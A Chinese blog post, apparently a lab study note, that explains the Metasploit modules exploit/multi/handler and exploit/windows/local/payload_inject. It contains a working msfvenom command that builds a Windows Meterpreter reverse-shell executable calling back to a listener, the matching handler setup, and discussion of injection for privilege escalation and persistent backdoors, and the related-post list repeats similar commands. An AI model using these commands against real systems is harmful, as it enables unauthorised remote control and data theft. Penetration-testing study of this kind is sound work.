Metasploit框架中的exploit/multi/handler和exploit/windows/local/payload_inject

已于 2024-07-21 00:06:27 修改
阅读量1.7k 收藏 34
点赞数 27
文章标签: 笔记
于 2024-07-21 00:00:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63082628/article/details/140579682
版权

exploit/multi/handler

在Metasploit框架中使用exploit/multi/handler模块,是用来接收来自目标系统的反向shell连接,通常是在已经成功利用某个漏洞并植入了Meterpreter shell或者执行了其他形式的代码之后的操作。

使用Metasploit生成一个可执行的payload,将这个payload上传到目标系统上并执行

以下是生成payload和使用multi/handler模块的一般步骤:

1. 生成Payload:

   使用msfvenom来创建一个payload,例如一个Windows可执行文件(.exe),指定LHOST和LPORT,这样payload在执行时就会尝试回调到这些设置好的值。

   msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.162 LPORT=5555 -f exe > payload.exe

2. 上传并执行Payload

   将生成的payload上传到目标系统。如果已经有对目标系统的访问权限,可将文件上传至目标系统上执行payload。(在我的实际使用场景中,已经通过蚁剑成功连接上了目标主机,因此直接用蚁剑上传文件并执行)

3. 监听Callback:

   在Metasploit框架中启动multi/handler模块,并设置LHOST和LPORT与生成payload时相同的值。 

  use exploit/multi/handler
  set PAYLOAD windows/x64/meterpreter/reverse_tcp
  set LHOST 192.168.52.162
  set LPORT 5555
  run

当payload在目标系统上执行并成功回调时,multi/handler模块应该会在Metasploit中显示一个新的会话(session),这意味着已经获得了对目标系统的控制。

exploit/windows/local/payload_inject 

exploit/windows/local/payload_inject 用于在已经获得一定权限的 Windows 系统上注入并执行任意的有效载荷(payload)。这个模块通常在以下场景下使用:

1. 权限提升:当已经通过某种方式获得了对目标 Windows 系统的访问权限,但权限级别较低时,可以尝试使用此模块来提升权限。例如,如果当前以普通用户身份登录,而需要 SYSTEM 权限才能执行某些操作,那么可以通过注入一个具有更高权限的 payload 来达到目的。

2. 持续访问:在渗透测试过程中,可能需要在目标系统上维持一个持久的连接,以便于后续的数据收集、横向移动等操作。通过注入一个包含 Meterpreter 或其他功能的 payload,我们可以创建一个持久的后门。

3. 执行特定任务:有时可能需要在目标系统上执行一些特定的任务,比如数据窃取、网络侦察等,这可以通过注入定制的 payload 来实现。

payload_inject 模块的工作原理大致如下:

它会在目标系统上寻找一个可利用的进程,通常是已知的、稳定的系统进程。然后模块会将我们生成的 payload 注入到该进程中。一旦 payload 被成功注入并执行,就可以与之建立一个会话,从而获得进一步的控制能力。

两个模块的区别

与 exploit/multi/handler 不同的是,payload_inject 并不专注于接收来自目标的反向连接。相反,它是用于在目标系统内部执行 payload,可能是为了提升权限、执行特定命令或建立持久连接。而 exploit/multi/handler 则主要用于处理由目标主动发起的反向连接请求,通常是在目标系统上已经成功执行了一个包含反向连接 payload 的情况下使用。

因此,exploit/windows/local/payload_inject 和 exploit/multi/handler 在 Metasploit 中扮演着不同的角色,前者更多地涉及在目标系统上的本地操作,后者则侧重于建立远程控制会话。

在靶场复现的过程中,对同一个步骤在博客中发现了这两种模块的使用,由于对这些模块不怎么熟悉,很好奇这两个模块有什么不同呢,做个简单的记录

找资料过程中看到的博文放个链接方便查看

【译】Metasploit:如何在 Metasploit 中使用反弹 Shell - 简书 (jianshu.com)

m-28
关注
Kali渗透测试:远程控制程序基础
Liu_Bruce的博客
05-07 3794
Kali渗透测试:远程控制程序基础 测试环境: 攻击机:Linux kali 5.16.0-kali (IP:192.168.68.248) 靶机:WinXP (IP:192.168.68.159) Win7 (IP:192.168.68.206) 1. 使用MSFPC生成被控端 远程控制软件中的被控端主控端必须是成对使用的。被控端运行在目标设备上,其功能挺起来木马很像,实际上是如此,被控端(可以是一段代码,也可以是一个能直接执行的程序)。在Kali Li
MSF里侦听模块的使用教程 exploit/multi/handler
qq_45249394的博客
11-25 1万+
标题关于MSF侦听模块的第一次使用 侦听模块exploit/multi/handler在使用这个模块的时候也被这个功能惊呆了,不管外网内网都能反弹shell,就是windows10的防火墙过不去,windows7的查不到,可能不更新的原因吧。如果想过墙只能自己加免杀的代码喽,反正我是还没学到呢。或者去百度shellter下载剥壳机自己加免杀的,有两个版本免费版专业版,本人亲测免费版过不了wind...
Kali-利用metasploit中的exploit/multi/handler进行攻击
热门推荐
齐泽文的Blog
04-22 1万+
在攻击服务器上生成连接软件,LHOST为攻击机IP地址msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe打开msfconsole控制台root@qzwhost:~# msfconsole msfconsole > use exploit/multi/handl...
Metasploit(MSF) multi/handler 模块高级选项解析
最新发布
vortex5的博客
03-04 1224
命令来查看该模块的高级选项。高级选项用于调整监听器(Handler)的行为,以适应不同的渗透测试场景。例如,你可以控制是否在建立会话后退出监听、是否启用详细日志、是否启用多线程处理连接等。是 Metasploit 中一个非常重要的模块,主要用于监听目标机的连接。这样,如果在 5 分钟内没有新的会话建立,监听会自动关闭。有时候监听端口可能会冲突,可以手动指定。这样,如果连接失败,stager。在 Metasploit。如果网络不稳定,可以增加。这样,即使已经建立会话,,可以继续等待新的连接。
exploit/multi/handler 具体使用案例
weixin_46483815的博客
10-31 1057
Metasploit Framework 中的一个模块,用于处理多态攻击载荷(payloads)。它允许你在渗透测试过程中管理执行多个攻击载荷。
Kali系列之multi/handler(渗透win7)
weixin_34007879的博客
04-13 1291
环境 靶机 192.168.137.133 kali 192.168.137.135 步骤+ 生成后门 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.137.135 LPORT=50000 -f exe -o openme.exe msfvenom -p windows/meterpreter...
Metasploit中meterpreter/reverse_tcp+exploit/multi/handler攻击实战教程
Amdy_amdy的博客
08-23 3151
Metasploit中meterpreter/reverse_tcp+exploit/multi/handler攻击实战教程 由于是实战,肯定要一个服务器对吗?为了不搞破坏,我这里就不用服务器了。我现在已经用另一台电脑搭建了一个网站(用phpstudy快速搭建的),这台电脑IP是:192.168.1.103; 我用的是渗透测试系统Kali Linux,由于此系统是自带Metasploit,我的Kali Linux系统IP是:192.168.40.132,并且能够通过火狐浏览器正常访问到192.168.1
内网渗透中metasploit与cs之间的会话转交
qq_53829555的博客
09-12 984
在内网渗透中,metasploit与cs往往是联合使用的,其意义与重要性不言而喻,涉及到很多后期操作例如联合提权,那么其二者之间会话的转交就是这一切后期操作的根本了这里监听机为kali2021.4版,靶机为win10
metasploit 如何生成 payload
05-25
3. `exploit/windows/local/payload_inject`模块:该模块可以生成用于本地提权的payload。 4. `exploit/windows/mssql/mssql_payload`模块:该模块可以生成针对Microsoft SQL Server的payload。 需要注意的是,...
ATT&CK实战系列——红队实战(二)
Demonering的博客
02-23 5243
环境配置 首先在VMware->编辑->虚拟网络编辑器里 更改子网ip为192.168.111.0 环境说明 DC IP:10.10.10.10 OS:Windows 2012 WEB(初始的状态默认密码无法登录,切换用户 de1ay/1qaz@WSX 登录进去) IP1:10.10.10.80 IP2:192.168.111.80 OS:Windows 2008 PC IP1:10.10.10.201 IP2:192.168.111.201 OS:Windows 7
MSF学习笔记(11)
Shadow 爬爬记
02-12 981
本地提权漏洞检测 meterpreter > run post/multi/recon/local_exploit_suggester 迁移到指定进程 migrate -N explorer.exe 自动脚本 msf exploit(multi/handler) > set AutoRunScript migrate -n explorer.exe msf ...
网络安全-木马入侵windows -msfvenom反弹shell(CMD)
weixin_48137911的博客
02-19 6180
需要做什么呢漏洞与木马的区别在于漏洞是某个系统某个框架,才能用特定的环境下才可以但是木马是全部机器都可以用因为木马相当于软件如果你电脑不能安装软件那你这个电脑也没啥用。
meterpreter之multi/handler
公众号shadow sock7
06-17 2688
参考: https://community.rapid7.com/thread/2083 In order to get multiple session on a single multi/handler, you need to set the ExitOnSession option to false and run the exploit -j instead of just the e
内网渗透(windows
qq_63980959的博客
04-05 3421
Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。
MSF使用1
xhscxj的博客
06-12 3710
进入kali中文件,将原有的源注释掉,换上清华的源 进行更新msf:辅助模块,辅助渗透(端口扫描、登录密码爆破、漏洞验证等) :漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。命名规则:操作系统/各种应用协议分类 :攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码 :后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令,如:提权等 :编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵检测
msfvenom生成后台木马监听目标(windows渗透测试)
forget_mt的博客
12-06 8504
针对windows操作系统的渗透测试 操作过程概况:利用msf生成一个后台木马,使用exploit/multi/handler模块,通过对方打开的形式获取权限,可以进入后渗透对目标进行监听等操作。 实战: 一:后台木马生成 注意在代码中LHOST:172.16.5.2与LPORT:4444 要根据实际情况来更改 LHOST设置为渗透机的ip LPORT设置为监听的端口,端口只要不是已经占用的就可以 msfvenom -a x86 --platform windows -p windows/m.
内网安全-域横向CS&MSF联动及应急响应初识
xhscxj的博客
03-25 4136
案例1:MSF&CobaltStrike联动Shell CS->MSF 创建Foreign监听器->MSF监听模块设置对应地址端口->CS执行Spawn选择监听器 MSF->CS CS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线 use exploit/windows/local/payload_inject 首先准备一台外网的服务器,安装上csmsf 将cs会话反弹到msf上 本地连接cs,目标cs上线后,创建监听 msf处..
黑客笔记:记一次sql注入到内网漫游
QIANDXX的博客
01-06 682
对于红队队员来说,打点之后最重要的就是横向的内网渗透了。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值